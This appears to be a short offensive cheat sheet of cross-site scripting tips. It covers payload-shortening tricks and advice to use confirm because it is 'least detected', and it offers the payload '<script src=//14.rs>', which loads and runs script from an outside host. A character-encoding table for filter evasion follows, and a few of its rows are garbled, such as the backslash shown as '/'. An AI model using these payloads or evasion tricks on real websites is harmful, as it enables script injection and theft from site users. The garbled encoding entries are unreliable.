XSS Tips
Tips & Tricks
http(s)://
can be shortened to//
or/\\
or\\
.document.cookie
can be shortened tocookie
. It applies to other DOM objects as well.alert and other pop-up functions don't need a value, so stop doing
alert('XSS')
and start doingalert()
You can use
//
to close a tag instead of>
.I have found that
confirm
is the least detected pop-up function so stop usingalert
.Quotes around attribute value aren't necessary as long as it doesn't contain spaces. You can use
<script src=//14.rs>
instead of<script src="//14.rs">
The shortest HTML context XSS payload is
<script src=//14.rs>
(19 chars)
Awesome Encoding
HTML | Char | Numeric | Description | Hex | CSS (ISO) | JS (Octal) | URL |
| " |
| quotation mark | u+0022 | \0022 | \42 | %22 |
| # |
| number sign | u+0023 | \0023 | \43 | %23 |
| $ |
| dollar sign | u+0024 | \0024 | \44 | %24 |
| % |
| percent sign | u+0025 | \0025 | \45 | %25 |
| `& |
| ampersand | u+0026 | \0026 | \46 | %26 |
| ' |
| apostrophe | u+0027 | \0027 | \47 | %27 |
| ( |
| left parenthesis | u+0028 | \0028 | \50 | %28 |
| ) |
| right parenthesis | u+0029 | \0029 | \51 | %29 |
| * |
| asterisk | u+002A | \002a | \52 | %2A |
| + |
| plus sign | u+002B | \002b | \53 | %2B |
| , |
| comma | u+002C | \002c | \54 | %2C |
| - |
| hyphen-minus | u+002D | \002d | \55 | %2D |
| . |
| full stop; period | u+002E | \002e | \56 | %2E |
| / |
| solidus; slash | u+002F | \002f | \57 | %2F |
| : |
| colon | u+003A | \003a | \72 | %3A |
| ;` |
| semicolon | u+003B | \003b | \73 | %3B |
| < |
| less-than | u+003C | \003c | \74 | %3C |
| = |
| equals | u+003D | \003d | \75 | %3D |
| > |
| greater-than sign | u+003E | \003e | \76 | %3E |
| ? |
| question mark | u+003F | \003f | \77 | %3F |
| @ |
| at sign; commercial at | u+0040 | \0040 | \100 | %40 |
| [ |
| left square bracket | u+005B | \005b | \133 | %5B |
| / |
| backslash | u+005C | \005c | \134 | %5C |
| ] |
| right square bracket | u+005D | \005d | \135 | %5D |
| ^ |
| circumflex accent | u+005E | \005e | \136 | %5E |
| _ |
| low line | u+005F | \005f | \137 | %5F |
| ` |
| grave accent | u+0060 | \0060 | \u0060 | %60 |
| { |
| left curly bracket | u+007b | \007b | \173 | %7b |
| | |
| vertical bar | u+007c | \007c | \174 | %7c |
| } |
| right curly bracket | u+007d | \007d | \175 | %7d |
Last updated